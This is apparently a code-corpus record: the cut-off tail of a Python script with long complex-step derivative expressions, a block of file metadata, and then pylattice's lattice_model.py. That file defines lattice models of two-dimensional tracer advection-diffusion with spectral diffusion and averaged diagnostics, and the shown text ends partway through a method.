- xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s + lamP22_N*(Dt*sigv**2*sin(theta_n*theta_s)**2 + p13_s*v*(1.0e-50*1j + p13_n)*cos(theta_n*theta_s) + p23_n*p23_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s + lamP23_N*(p33_n*p33_s*v*cos(theta_n*theta_s) - p13_s*(1.0e-50*1j + p13_n)*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s + lamP33_N*(Dt*sigw**2 - p13_s*(1.0e-50*1j + p13_n)*(x_n*x_s - xb)*(p13_s*(1.0e-50*1j + p13_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_s*(1.0e-50*1j + p13_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p13_s*(1.0e-50*1j + p13_n)*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_s*(1.0e-50*1j + p13_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p33_s)/1e-50),
(tf)*(-np.imag(lamP12_N*(Dt*sigv**2*sin(theta_n*theta_s)*cos(theta_n*theta_s) - p13_n*p13_s*v*sin(theta_n*theta_s) + p13_n*p13_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_s*(1.0e-50*1j + p22_n)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s + lamP22_N*(Dt*sigv**2*sin(theta_n*theta_s)**2 + p13_n*p13_s*v*cos(theta_n*theta_s) + p23_n*p23_s*v*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_s*(1.0e-50*1j + p22_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_s*(1.0e-50*1j + p22_n)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_s*(1.0e-50*1j + p22_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s + lamP23_N*(p33_n*p33_s*v*cos(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_s*(1.0e-50*1j + p22_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_s*(1.0e-50*1j + p22_n)*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s)/1e-50),
(tf)*(-np.imag(lamP13_N*(-p33_n*p33_s*v*sin(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_s*(1.0e-50*1j + p23_n)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s + lamP22_N*(Dt*sigv**2*sin(theta_n*theta_s)**2 + p13_n*p13_s*v*cos(theta_n*theta_s) + p23_s*v*(1.0e-50*1j + p23_n)*cos(theta_n*theta_s) - p12_n*p12_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s + lamP23_N*(p33_n*p33_s*v*cos(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_s*(1.0e-50*1j + p23_n)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s + lamP33_N*(Dt*sigw**2 - p13_n*p13_s*(x_n*x_s - xb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_s*(1.0e-50*1j + p23_n)*(y_n*y_s - yb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p33_s)/1e-50),
(tf)*(-np.imag(lamP13_N*(-p33_s*v*(1.0e-50*1j + p33_n)*sin(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s + lamP23_N*(p33_s*v*(1.0e-50*1j + p33_n)*cos(theta_n*theta_s) - p13_n*p13_s*(x_n*x_s - xb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s)/1e-50),
tf*0,
])
print(gx)
tock = toc()
print('N:' + str(tock))
print(fx-gx)
| 536.10989
| 8,342
| 0.557189
| 14,188
| 48,786
| 1.584367
| 0.005145
| 0.073046
| 0.094889
| 0.12634
| 0.97838
| 0.978113
| 0.97531
| 0.974065
| 0.96797
| 0.961208
| 0
| 0.1152
| 0.115504
| 48,786
| 91
| 8,343
| 536.10989
| 0.405738
| 0
| 0
| 0.131579
| 0
| 0
| 0.000082
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.039474
| 0
| 0.039474
| 0.065789
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
acf1c9e4c794a4dd6785333797b6b383d4e6c632
| 23,891
|
py
|
Python
|
experiments/lattice_model.py
|
crocha700/pylattice
|
54c13735fecee121ffea8048f0f37d9b196f8e54
|
[
"MIT"
] | null | null | null |
experiments/lattice_model.py
|
crocha700/pylattice
|
54c13735fecee121ffea8048f0f37d9b196f8e54
|
[
"MIT"
] | null | null | null |
experiments/lattice_model.py
|
crocha700/pylattice
|
54c13735fecee121ffea8048f0f37d9b196f8e54
|
[
"MIT"
] | null | null | null |
from __future__ import division
import numpy as np
from numpy import pi, cos, sin, exp
class LatticeModel():
""" A class that represents a two-dimensional lattice
model of advection-diffusion with large-scale
sinusoidal source """
def __init__(self,
nx=128,
ny=None,
Lx=2*pi,
Ly=None,
dt=0.5,
tmax=1000,
tavestart = 500,
kappa=1.e-5,
urms = 1.,
power = 3.5,
nmin = 5.,
nmax = None,
source=True,
diagnostics_list='all'):
if ny is None: ny = nx
if Ly is None: Ly = Lx
self.nx = nx
self.ny = ny
self.Lx = Lx
self.Ly = Ly
self.dt = dt
self.dt_2 = dt/2.
self.dt_4 = dt/4.
self.tmax = tmax
self.tavestart = tavestart
self.t = 0.
self.tc = 0
self.kappa = kappa
self.nmin = nmin
if nmax:
self.nmax = nmax
else:
self.nmax = nx
self.power = power
self.urms = urms
self.source=source
self.diagnostics_list = diagnostics_list
self._initialize_grid()
self._init_velocity()
self._initialize_diagnostics()
self.even = True
self.odd = False
def _initialize_grid(self):
""" Initialize lattice and spectral space grid """
# physical space grids
self.dx, self.dy = self.Lx/(self.nx), self.Ly/(self.ny)
self.x = np.linspace(0.,self.Lx-self.dx,self.nx)
self.y = np.linspace(0.,self.Ly-self.dy,self.ny)
self.xi, self.yi = np.meshgrid(self.x,self.y)
self.ix, self.iy = np.meshgrid(range(self.nx),
range(self.ny))
# wavenumber grids
self.dk = 2.*pi/self.Lx
self.dl = 2.*pi/self.Ly
self.nl = self.ny
self.nk = self.nx//2 + 1
self.ll = self.dl*np.append( np.arange(0.,self.nx/2),
np.arange(-self.nx/2,0.) )
self.kk = self.dk*np.arange(0.,self.nk)
self.k, self.l = np.meshgrid(self.kk, self.ll)
self.ik = 1j*self.k
self.il = 1j*self.l
# constant for spectral normalizations
self.M = self.nx*self.ny
self.M2 = self.M**2
self.wv2 = self.k**2 + self.l**2
self.wv = np.sqrt( self.wv2 )
def _velocity(self):
phase = 2*pi*np.random.rand(2,self.nmax-self.nmin)
phi, psi = phase[0], phase[1]
Yn = self.n*self.y[...,np.newaxis] + phase[0][np.newaxis,...]
Xn = self.n*self.x[...,np.newaxis] + phase[1][np.newaxis,...]
u = (self.An*cos(Yn*self.dl)).sum(axis=1)
v = (self.An*cos(Xn*self.dk)).sum(axis=1)
self.u = u[...,np.newaxis]
self.v = v[np.newaxis,...]
def _init_velocity(self):
self.n = np.arange(self.nmin,self.nmax)[np.newaxis,...]
An = (self.n/self.nmin)**(-self.power/2.)
N = 2*self.urms/( np.sqrt( ((self.n/self.nmin)**-self.power).sum() ) )
self.An = N*An
#self.An = np.sqrt(2.)
#self.An = 2*urms
# estimate the Batchelor scale
S = np.sqrt( ((self.An*self.n*self.dk)**2).sum()/2. )
self.lb = np.sqrt(self.kappa/S)
#assert self.lb > self.dx, "**Warning: Batchelor scale not resolved."
def _advect(self,direction='x',n=1):
""" Advect th on a lattice given u and v,
and the current index array ix, iy
n is the number of substeps
n=1 for doing the full advection-diffusion,
n=2 for doing half the advection, etc """
if direction == 'x':
ix_new = self.ix.copy()
dindx = -np.round(self.u*self.dt_2/n/self.dx).astype(int)
ix_new = self.ix + dindx
ix_new[ix_new<0] = ix_new[ix_new<0] + self.nx
ix_new[ix_new>self.nx-1] = ix_new[ix_new>self.nx-1] - self.nx
self.th = self.th[self.iy,ix_new]
elif direction == 'y':
iy_new = self.iy.copy()
dindy = -np.round(self.v*self.dt_2/n/self.dy).astype(int)
iy_new = self.iy + dindy
iy_new[iy_new<0] = iy_new[iy_new<0] + self.ny
iy_new[iy_new>self.ny-1] = iy_new[iy_new>self.ny-1] - self.ny
self.th = self.th[iy_new,self.ix]
# advection + source
#y = self.y[...,np.newaxis] + np.zeros(self.x.size)[np.newaxis,...]
#v = self.v + np.zeros(self.y.size)[...,np.newaxis]
#sy = np.sin(self.dl*y)
#syn = np.sin(self.dl*(y+v*self.dt_2/n))
#v = np.ma.masked_array(v, v == 0.)
#self.forcey = (sy[iy_new,self.ix]-sy)/(self.dl*v)
#self.forcey = (syn-sy)/(self.dl*v)
#self.forcey[v.mask] = (self.dt_2/n)*np.cos(self.dl*y[v.mask])
#self.th = self.th[iy_new,self.ix] + self.forcey
def _diffuse(self, n=1):
""" Diffusion """
self.thh = np.fft.rfft2(self.th)
self.thh = self.thh*exp(-(self.dt/n)*self.kappa*self.wv2)
self.th = np.fft.irfft2(self.thh)
def _source(self,direction='x',n=1):
if direction == 'x':
self.th += (self.dt/n)*np.cos(self.dl*self.y)[...,np.newaxis]
elif direction == 'y':
# a brutal way
#self.th += (self.dt/n)*np.cos(self.dl*self.y)[...,np.newaxis]
pass
def _step_forward(self):
self._velocity()
# x-dir
self._advect(direction='x',n=2)
self._source(direction='x',n=2)
self._diffuse(n=4)
self._advect(direction='x',n=2)
self._source(direction='x',n=2)
self._diffuse(n=4)
# y-dir
self._advect(direction='y',n=2)
self._source(direction='y',n=2)
self._diffuse(n=4)
self._advect(direction='y',n=2)
self._source(direction='y',n=2)
self._diffuse(n=4)
self._calc_diagnostics()
self.tc += 1
self.t += self.dt
def run_with_snapshots(self, tsnapstart=0., tsnap=1):
"""Run the model forward, yielding to user code at specified intervals.
"""
tsnapint = np.ceil(tsnap/self.dt)
while(self.t < self.tmax):
self._step_forward()
if self.t>=tsnapstart and (self.tc%tsnapint)==0:
yield self.t
return
def run(self):
"""Run the model forward without stopping until the end."""
while(self.t < self.tmax):
self._step_forward()
def _calc_diagnostics(self):
# here is where we calculate diagnostics
if (self.t>=self.dt) and (self.t>=self.tavestart):
self._increment_diagnostics()
# diagnostic stuff follow
def _initialize_diagnostics(self):
# Initialization for diagnotics
self.diagnostics = dict()
self._setup_diagnostics()
if self.diagnostics_list == 'all':
pass # by default, all diagnostics are active
elif self.diagnostics_list == 'none':
self._set_active_diagnostics([])
else:
self._set_active_diagnostics(self.diagnostics_list)
def _setup_diagnostics(self):
"""Diagnostics setup"""
self.add_diagnostic('var',
description='Tracer variance',
function= (lambda self: self.spec_var(self.thh))
)
self.add_diagnostic('thbar',
description='x-averaged tracer',
function= (lambda self: self.thm)
)
self.add_diagnostic('grad2_th_bar',
description='x-averaged gradient square of th',
function= (lambda self: self.gradth2m)
)
self.add_diagnostic('vth2m',
description='x-averaged triple advective term v th2',
function= (lambda self: self.vth2m)
)
self.add_diagnostic('th2m',
description='x-averaged th2',
function= (lambda self: self.th2m)
)
self.add_diagnostic('vthm',
description='x-averaged, y-direction tracer flux',
function= (lambda self: (self.v*self.tha).mean(axis=1))
)
self.add_diagnostic('fluxy',
description='x-averaged, y-direction tracer flux',
function= (lambda self: (self.v*self.th).mean(axis=1))
)
self.add_diagnostic('spec',
description='spec of anomalies about x-averaged flow',
function= (lambda self: np.abs(np.fft.rfft2(
self.th-self.th.mean(axis=1)[...,np.newaxis]))**2/self.M2)
)
def _set_active_diagnostics(self, diagnostics_list):
for d in self.diagnostics:
# use assignment, not comparison, so the 'active' flag is actually updated
self.diagnostics[d]['active'] = (d in diagnostics_list)
def add_diagnostic(self, diag_name, description=None, units=None, function=None):
# create a new diagnostic dict and add it to the object array
# make sure the function is callable
assert hasattr(function, '__call__')
# make sure the name is valid
assert isinstance(diag_name, str)
# by default, diagnostic is active
self.diagnostics[diag_name] = {
'description': description,
'units': units,
'active': True,
'count': 0,
'function': function, }
def describe_diagnostics(self):
"""Print a human-readable summary of the available diagnostics."""
diag_names = sorted(self.diagnostics.keys())
print('NAME | DESCRIPTION')
print(80*'-')
for k in diag_names:
d = self.diagnostics[k]
print('{:<10} | {:<54}'.format(k, d['description']))
def _increment_diagnostics(self):
# compute intermediate quantities needed for some diagnostics
self._calc_derived_fields()
for dname in self.diagnostics:
if self.diagnostics[dname]['active']:
res = self.diagnostics[dname]['function'](self)
if self.diagnostics[dname]['count']==0:
self.diagnostics[dname]['value'] = res
else:
self.diagnostics[dname]['value'] += res
self.diagnostics[dname]['count'] += 1
def _calc_derived_fields(self):
""" Calculate derived field necessary for diagnostics """
self.thh = np.fft.rfft2(self.th)
# x-averaged tracer field
self.thm = self.th.mean(axis=1)
#self.thmh = np.fft.rfft(self.thm)
#self.thm_y = np.fft.irfft(1j*self.kk*self.thmh)
# anomaly about the x-averaged field
self.tha = self.th-self.thm[...,np.newaxis]
self.thah = np.fft.rfft2(self.tha)
# x-averaged gradient squared
gradx = np.fft.irfft2(1j*self.k*self.thah)
grady = np.fft.irfft2(1j*self.l*self.thah)
self.gradth2m = (gradx**2 + grady**2).mean(axis=1)
# Osborn-Cox amplification factor
#self.thm_y = 4*np.sin(self.y*self.dl)
#thm_y = self.block_average(self.thm_y)
#gradth2m = self.block_average(self.gradth2m)
#self.A2_OC = gradth2m / thm_y**2
#self.A2_OC[thm_y < 1.e-14] = np.nan
# triple term
self.vth2m = (self.v*(self.tha**2)).mean(axis=1)
# diff transport
self.th2m = (self.tha**2).mean(axis=1)
def get_diagnostic(self, dname):
return (self.diagnostics[dname]['value'] /
self.diagnostics[dname]['count'])
def spec_var(self, ph):
""" compute variance of p from Fourier coefficients ph """
var_dens = 2. * np.abs(ph)**2 / self.M**2
# only half of coefs [0] and [nx/2+1] due to symmetry in real fft2
var_dens[...,0] = var_dens[...,0]/2.
var_dens[...,-1] = var_dens[...,-1]/2.
return var_dens.sum()
def block_average(self,A, nblocks = 256):
""" Block average A onto A blocks """
nave = self.nx/nblocks
Ab = np.empty(nblocks)
for i in range(nblocks):
Ab[i] = A[i*nave:(i+1)*nave].mean()
return Ab
class LatticeModelGy():
""" A class that represents a two-dimensional lattice
model of advection-diffusion with large-scale
sinusoidal source """
def __init__(self,
nx=128,
ny=None,
Lx=2*pi,
Ly=None,
dt=0.5,
tmax=1000,
tavestart = 500,
kappa=1.e-5,
urms = 1.,
power = 3.5,
nmin = 5.,
nmax = None,
G = 1.,
diagnostics_list='all',
cadence = 5):
if ny is None: ny = nx
if Ly is None: Ly = Lx
self.nx = nx
self.ny = ny
self.Lx = Lx
self.Ly = Ly
self.dt = dt
self.dt_2 = dt/2.
self.dt_4 = dt/4.
self.tmax = tmax
self.tavestart = tavestart
self.t = 0.
self.tc = 0
self.G = G
self.kappa = kappa
self.nmin = nmin
if nmax:
self.nmax = nmax
else:
self.nmax = nx
self.power = power
self.urms = urms
self.diagnostics_list = diagnostics_list
self.cadence = cadence
self._initialize_grid()
self._init_velocity()
self._initialize_diagnostics()
self.even = True
self.odd = False
def _initialize_grid(self):
""" Initialize lattice and spectral space grid """
# physical space grids
self.dx, self.dy = self.Lx/(self.nx), self.Ly/(self.ny)
self.x = np.linspace(0.,self.Lx-self.dx,self.nx)
self.y = np.linspace(0.,self.Ly-self.dy,self.ny)
self.xi, self.yi = np.meshgrid(self.x,self.y)
self.ix, self.iy = np.meshgrid(range(self.nx),
range(self.ny))
# wavenumber grids
self.dk = 2.*pi/self.Lx
self.dl = 2.*pi/self.Ly
self.nl = self.ny
self.nk = self.nx//2 + 1
self.ll = self.dl*np.append( np.arange(0.,self.nx/2),
np.arange(-self.nx/2,0.) )
self.kk = self.dk*np.arange(0.,self.nk)
self.k, self.l = np.meshgrid(self.kk, self.ll)
self.ik = 1j*self.k
self.il = 1j*self.l
# constant for spectral normalizations
self.M = self.nx*self.ny
self.M2 = self.M**2
self.wv2 = self.k**2 + self.l**2
self.wv = np.sqrt( self.wv2 )
def _velocity(self):
phase = 2*pi*np.random.rand(2,self.nmax-self.nmin)
phi, psi = phase[0], phase[1]
Yn = self.n*self.y[...,np.newaxis] + phase[0][np.newaxis,...]
Xn = self.n*self.x[...,np.newaxis] + phase[1][np.newaxis,...]
u = (self.An*cos(Yn*self.dl)).sum(axis=1)
v = (self.An*cos(Xn*self.dk)).sum(axis=1)
self.u = u[...,np.newaxis]
self.v = v[np.newaxis,...]
def _init_velocity(self):
self.n = np.arange(self.nmin,self.nmax)[np.newaxis,...]
An = (self.n/self.nmin)**(-self.power/2.)
N = 2*self.urms/( np.sqrt( ((self.n/self.nmin)**-self.power).sum() ) )
self.An = N*An
#self.An = np.sqrt(2.)
#self.An = 2*urms
# estimate the Batchelor scale
S = np.sqrt( ((self.An*self.n*self.dk)**2).sum()/2. )
self.lb = np.sqrt(self.kappa/S)
#assert self.lb > self.dx, "**Warning: Batchelor scale not resolved."
def _advect(self,direction='x',n=1):
""" Advect th on a lattice given u and v,
and the current index array ix, iy
n is the number of substeps
n=1 for doing the full advection-diffusion,
n=2 for doing half the advection, etc """
if direction == 'x':
ix_new = self.ix.copy()
dindx = -np.round(self.u*self.dt_2/n/self.dx).astype(int)
ix_new = self.ix + dindx
ix_new[ix_new<0] = ix_new[ix_new<0] + self.nx
ix_new[ix_new>self.nx-1] = ix_new[ix_new>self.nx-1] - self.nx
self.th = self.th[self.iy,ix_new]
elif direction == 'y':
iy_new = self.iy.copy()
dindy = -np.round(self.v*self.dt_2/n/self.dy).astype(int)
iy_new = self.iy + dindy
iy_new[iy_new<0] = iy_new[iy_new<0] + self.ny
iy_new[iy_new>self.ny-1] = iy_new[iy_new>self.ny-1] - self.ny
self.th = self.th[iy_new,self.ix] + self.G*self.v*self.dt_2/n
def _diffuse(self, n=1):
""" Diffusion """
self.thh = np.fft.rfft2(self.th)
self.thh = self.thh*exp(-(self.dt/n)*self.kappa*self.wv2)
self.th = np.fft.irfft2(self.thh)
def _step_forward(self):
self._velocity()
# x-dir
self._advect(direction='x',n=2)
self._calc_diagnostics()
self._diffuse(n=4)
#self._calc_diagnostics()
self._advect(direction='x',n=2)
self._calc_diagnostics()
self._diffuse(n=4)
#self._calc_diagnostics()
# y-dir
self._advect(direction='y',n=2)
self._calc_diagnostics()
self._diffuse(n=4)
#self._calc_diagnostics()
self._advect(direction='y',n=2)
self._calc_diagnostics()
self._diffuse(n=4)
#self._calc_diagnostics()
self.tc += 1
self.t += self.dt
def run_with_snapshots(self, tsnapstart=0., tsnap=1):
"""Run the model forward, yielding to user code at specified intervals.
"""
tsnapint = np.ceil(tsnap/self.dt)
while(self.t < self.tmax):
self._step_forward()
if self.t>=tsnapstart and (self.tc%tsnapint)==0:
yield self.t
return
def run(self):
"""Run the model forward without stopping until the end."""
while(self.t < self.tmax):
self._step_forward()
def _calc_diagnostics(self):
# here is where we calculate diagnostics
if (self.t>=self.dt) and (self.t>=self.tavestart) and (self.tc%self.cadence):
self._increment_diagnostics()
# diagnostic stuff follow
def _initialize_diagnostics(self):
# Initialization for diagnotics
self.diagnostics = dict()
self._setup_diagnostics()
if self.diagnostics_list == 'all':
pass # by default, all diagnostics are active
elif self.diagnostics_list == 'none':
self._set_active_diagnostics([])
else:
self._set_active_diagnostics(self.diagnostics_list)
def _setup_diagnostics(self):
"""Diagnostics setup"""
self.add_diagnostic('var',
description='Tracer variance',
function= (lambda self: self.spec_var(self.thh))
)
self.add_diagnostic('thbar',
description='x-averaged tracer',
function= (lambda self: self.thm)
)
self.add_diagnostic('grad2_th_bar',
description='x-averaged gradient square of th',
function= (lambda self: self.gradth2m)
)
self.add_diagnostic('vth2m',
description='x-averaged triple advective term v th2',
function= (lambda self: self.vth2m)
)
self.add_diagnostic('th2m',
description='x-averaged th2',
function= (lambda self: self.th2m)
)
self.add_diagnostic('vthm',
description='x-averaged, y-direction tracer flux',
function= (lambda self: (self.v*self.tha).mean(axis=1))
)
self.add_diagnostic('fluxy',
description='x-averaged, y-direction tracer flux',
function= (lambda self: (self.v*self.th).mean(axis=1))
)
self.add_diagnostic('spec',
description='spec of anomalies about x-averaged flow',
function= (lambda self: np.abs(np.fft.rfft2(
self.th-self.th.mean(axis=1)[...,np.newaxis]))**2/self.M2)
)
def _set_active_diagnostics(self, diagnostics_list):
for d in self.diagnostics:
# use assignment, not comparison, so the 'active' flag is actually updated
self.diagnostics[d]['active'] = (d in diagnostics_list)
def add_diagnostic(self, diag_name, description=None, units=None, function=None):
# create a new diagnostic dict and add it to the object array
# make sure the function is callable
assert hasattr(function, '__call__')
# make sure the name is valid
assert isinstance(diag_name, str)
# by default, diagnostic is active
self.diagnostics[diag_name] = {
'description': description,
'units': units,
'active': True,
'count': 0,
'function': function, }
def describe_diagnostics(self):
"""Print a human-readable summary of the available diagnostics."""
diag_names = sorted(self.diagnostics.keys())
print('NAME | DESCRIPTION')
print(80*'-')
for k in diag_names:
d = self.diagnostics[k]
print('{:<10} | {:<54}'.format(k, d['description']))
def _increment_diagnostics(self):
# compute intermediate quantities needed for some diagnostics
self._calc_derived_fields()
for dname in self.diagnostics:
if self.diagnostics[dname]['active']:
res = self.diagnostics[dname]['function'](self)
if self.diagnostics[dname]['count']==0:
self.diagnostics[dname]['value'] = res
else:
self.diagnostics[dname]['value'] += res
self.diagnostics[dname]['count'] += 1
def _calc_derived_fields(self):
""" Calculate derived field necessary for diagnostics """
self.thh = np.fft.rfft2(self.th)
